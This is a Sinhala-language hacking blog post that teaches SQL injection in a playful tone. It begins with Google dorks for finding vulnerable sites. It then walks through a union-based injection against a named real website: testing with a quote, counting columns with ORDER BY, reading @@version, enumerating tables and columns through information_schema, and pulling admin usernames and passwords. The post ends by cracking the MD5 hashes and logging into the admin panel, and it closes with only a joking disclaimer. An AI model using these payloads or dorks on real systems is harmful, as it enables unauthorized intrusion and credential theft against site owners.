Skip to main content

SQL Injection ගැන දැනගනිමු



හායි ගායිස් 😍😍..අද කට්ටියට කියල දෙන්න හදන්නෙ  මොකක්ද මේ SQL Injection කියන්නෙ සහ ඒක පාවිච්චි කරන විදිහ ගැන.මුලින්ම  බලමු මේ මම කියවන්නෙ මොකක් ගැනද කියල.උබල දන්නවනෙ  වෙබ් සයිට් එක එක විදිහට හැදිල තියනව. SQL Injections  කියන්නෙත් එන්න වගේ වෙබ් සයිට් හැදිල තියන ක්රමයක්.ඕකෙදි වැරැද්දක් උනොත් ඒක මුලු සයිට් එකටම බලපානව. SQL Injection එකකදි අපි කරන්නෙ වගේ වැරැද්දක් තියන සයිට් හොයල ඒවට රිංගල අපෙ ආතල් එක ගන්න එක 😁😁.

මේ වැරදි තියන සයිට් වලට අපි කියන්නෙ Vulnerable Site කියල.අපි දැන් කරන්න හදන්නෙ මේ Vulnerable Site එකක් හොයාගෙන ඒකට SQL Injection  එකක් ගහල සයිට් එකේ ඇඩ්මින් මේල්, පාස්වර්ඩ්  හොයාගෙන කෙලින්ම Admin Panel එකට රිංගන එක.
උබලට දැන් තියන ප්රශ්නෙ කොහොමද Vulnerable Site එකක් හොයාගන්නෙ කියලනෙ.ඒකට තමා Google Dork තියෙන්නෙ.ඩෝර්ක් කියන්නෙ මොනාද ඩෝර්ක් රොත්තක් පස්සෙ පෝස්ට් එකකින් දාන්නම්.දැනට ඔය පහල මම දාල තියන එකක් දාල නිකම්ම ගූගල් සර්ච් කරන්න.

Inurl:php?id=
products.php?type=
event.php?id=
showfeature.php?id=
home.php?ID=
tas/event.php?id=
profile.php?id=
details.php?id=
past-event.php?id=
index.php?action=
ඊටපස්සෙ එන රිසල්ට් වලින් උබල කැමති එකකට පලයන්.මම ආපු එක රිසල්ට් එකක් ගන්නම් උදාහරණෙකට.

http://bible-history.com/subcat.php?id=2

දැන් අපි කරන්න ඕනෙ මේක Vulnerable Site එකක්ද කියල බලන එක.ඒකට කරන්න ඕන ඔය ලින්ක් එකේ අගට ` දාල බලන එක.

http://bible-history.com/subcat.php?id=2`

මෙහෙම කරල error එකක් ආවෙ නැත්තම් අපිට 3 දාල බලන්න වෙනව error එකක් එනවද කියල.කම්මැලී තමා බන් ඒත් ඉතින් ඉගෙනගද්දි ඔහොම තමා..අපි දැන් හිතමු 3 දි error එකක් ආව කියල.ඊලගට අපි බලන්න ඕනෙ මේ සයිට් එකේ Column කීයක් තියනවද කියල.ඒකට පාවිච්චි කරන්නෙ  order by කියන කෝඩ් එක.

http://bible-history.com/subcat.php?id=2 order by 1--

ඔහොම කරල  MySQL error  එකක් ආවෙ නැත්තම් 2,3 විදිහට කරල බලන්න ඕන.ලේසි විදිහක් උබල ඕක කරද්දි තේරෙයි.අපි දැන් හිතමු  7 දි error   එකක් ආව කියල. කියන්නෙ Column තියෙන්නෙ 6 යි.දැන් අපි හොයාගන්න ඕන ඔය 6න් මොකක්ද Vulnerable Column එක කියල.ඒකට අපි URL එක අගට union select 1,2,3,4--විදිහට දාගන්නව තියන කොලම් ගාන වෙනකල්.හැබැයි ඒක කරද්දි ? id=1 කියලා තියන එක ?id= -1 කියල දාන්න ඕනි.ඒ කියන්නෙ අපි දැන් කරන් ආපු විදිහටනම් ලින්ක් එක මේ විදිහට තියෙන්න ඕනෙ.

http://bible-history.com/subcat.php?id=-2  union select 1,2,3,4,5,6--

එතකොට අපිට එනව වීක් කොලම් එක මොකක්ද කියල.ඒක මතක තියාගන්න.ඊලගට අපි කරන්න ඕන Database version එක මොකක්ද කියල බලන එක.දැන් දාන කමන්ඩ් එක Database version 5 හෝ ඊට වැඩි ඒවට තමා වැඩ කරන්නෙ.ඊට පහල ඒව ආවොත් කරන හැටි දන්නවනම්  කමන්ට් එකක් දාගෙනම යන්න.මේකට අපි  කරන්න ඕන කලින් ලින්ක් එකම අරගෙන අර මතක තියාගන්න කිව්ව වීක් කොලම් එක තිබ්බ තැනට  @@version කියල දාන එක.ඒ කිව්වෙ වීක් කොලම් එක 4 නම් ,

http://bible-history.com/subcat.php?id=-2  union select 1,2,3, @@version,5,6--

එතකොට අපිට 5.1.63-cll වගේ එනව වර්ශන් එක.ඊටපස්සෙ අපි බලමු මේකෙ  කොලම් ටික මොනාද කියල.මෙතන ඉදන් කෝඩ් එක දාන්නෙ ඕකෙ ඕන තැන් උබල වෙනස් කරගනිල්ල හොදද. 



http://bible-history.com/subcat.php?id=-2  union select 1,2,3,group_concat(table_name),5,6FROM information_schema.tables WHERE table_schema=database()--

ඔන්න දැන් අපිට කොලම් ටික පේනව.ඊටපස්සෙ අපි කරන්න ඕන ඇඩ්මින්ගෙ විස්තර තියන එක හොයාගන්න එක.

http://bible-history.com/subcat.php?id=-2  union select 1,2,3, group_concat(column_name)5, FROM information_schema.columns WHERE table_name="admin_credentials"

ඊටපස්සෙ ලස්සනට පිලිවෙලට Username එකයි  Password එකයි 💗.දැන් කරන්න තියෙන්නෙ Havij වගේ සොෆ්ට්වෙයා එකකින් ඇඩ්මින් පැනල් එක හොයාගෙන ඔය ආපු Username, Password ගහල ලොග් වෙන එක.ගොඩක් දුරට පාස්වර්ඩ් ඇත්තෙ  MD5 වලින්.ඒව කන්වර්ට් කරගන්න ගූගල් සර්ච් කරපන් ඕන තරම් සයිට් තියෙයි.

ඔන්න ඔහොම තමා SQL Injection කරන්නෙ.ඔහොම මුලින් පුරුදු උනාම තව අලුත් ක්‍රම  එක්කම ලේසියෙන් කරන්න පුලුවන් ක්‍රමත් අහුවෙයි.එහෙනම් පෝස්ට් එක ඉවරයි.ඔතන සමහර කෝඩ් දැම්මෙ නෑ වැඩක් නැති හන්ද.අපැහැදිලි තැන් තියෙයිනම් කියන්න අඩුපාඩු ඇති  ඒවත් අමතක නොකර කියන්න හොදේ.අන්තිමට කියන්න තියෙන්නෙ මේව නරක විදිහට පාවිච්චි කරන්නෙපා මොකද නීති විරෝධී වැඩ මෙව්ව 😂💣.

එහෙනම් අලුත්  Post එකකින් ආපහු හම්බෙමු. ජය වේවා ඔක්කොටම !!!

#ALEX

No One is Safe Security is a Joke






Comments

Post a Comment

Popular posts from this blog

HTML මුල සිට සරලව!!! ( 6 කොටස)

කොහොමද යාලුවනේ…ගොඩ කාලෙකට පස්සෙ බ්ලොග් එක පැත්තෙ ආවෙ…මතක ඇති අපි html tut ටිකක් දැම්ම ඒ සෙට් එකේ හයවෙනි කොටස තමා අද දෙන්න යන්නෙ… HTML පරණ post 5 කියෙව්වෙ නැත්නම් මේ Link වලට ගිහින් කියවන්න! HTML මුල සිට සරලව!!! ( 5 කොටස) - http://www.sltechz.tk/2018/06/html-5.html HTML මුල සිට සරලව!!! ( 4 කොටස) - http://www.sltechz.tk/2018/06/html-4.html HTML මුල සිට සරලව!!! ( 3 කොටස) - http://www.sltechz.tk/2018/06/html-3.html HTML මුල සිට සරලව!!! ( 2 කොටස) - http://www.sltechz.tk/2018/06/html-2.html HTML මුල සිට සරලව!!! ( 1 කොටස) - http://www.sltechz.tk/2018/06/html-1.html මේකෙදි කතාකරන්න යන්නෙ colors පිලිබදව…web page එකක් ලස්සනට තියාගන්න නතුවම බැරි දෙයක්නෙ ඉතින් colors කියන්නෙ…මුලින්ම අපි බලමු Headline එකක හරි Paragraph එකක හරි Background එකට color දාන හැටි…මේඋදාහරනෙ බැලුවොත් ඔයාලට තේරෙයි… <html> <head> <title>Colors</title> </head> <body> <h1 style="background-color:Blue;">Blue Background Hea...

WhatsApp වලට අලුතින්ම එකතුවෙන විශේෂාංග

වට්සැප් පාවිච්චි කරන අයට අලුත්ම News එකක් අරගෙනයි අද ආවෙ.ෆේස්බුක් සමගමේ   F8 2018 සමුළුවෙදි   වට්සැප් එයාලගෙ ප්‍රගතිය ගැන කතා කරල තියනව.ඒකට අනුව Snapchat Stories හි WhatsApp හි පිටපත සතුව දිනපතා ක්රියාකාරියින් මිලියන 450 ක් විතර ඉන්නවලු   දැන්.එන්න එන්න මේ ගාණ වැඩිවෙන හන්දම එයාල තීරණය කරල තියනව වට්සැප් වලට අලුත් විශේෂාංග 2ක් හඳුන්වල දෙන්න.ඒ දෙක තමා ඔය. WhatsApp group Video call Stickers මේ විශේෂාංග දෙක ගැන සමහර වෙලාවල් වලදි WhatsApp beta Version එකේදි පෙන්නල දීල තියනව.විශේෂයෙන්ම ස්ටිකර් ගැන.දැනටමත් එක්කෙනෙක් එක්ක Video , Audio කෝල් පහසුකම වට්සැප් වල තියනවනෙ.මේ සමුළුවෙදි පෙන්නපු විදිහට එකපාර හතරදෙනෙක්ට මේ group Video call එකට සෙට් වෙන්න පුලුවන්.විස්තර බොහොම ටිකයි තමා මේ ගැන කියල තියෙන්නෙ.කොටින්ම Group Audio call ගැන මොකුත්ම කියල නෑ😒😒. Messenger, Hike සහ WeChat වගේ ඇප් වල කාලෙක ඉදන් තමා මේ ස්ටිකර් පාවිච්චි වෙන්නෙ.ඔන්න වට්සැප් වලත් මේ ස්ටිකර් දෙනව කියල තමා මෙයාල මේ සමුළුවෙදි කියල තියෙන්නෙ. WhatsApp beta Version එකේ දැනට ස්ටිකර් ටිකක් තියනවනෙ.ඉස්...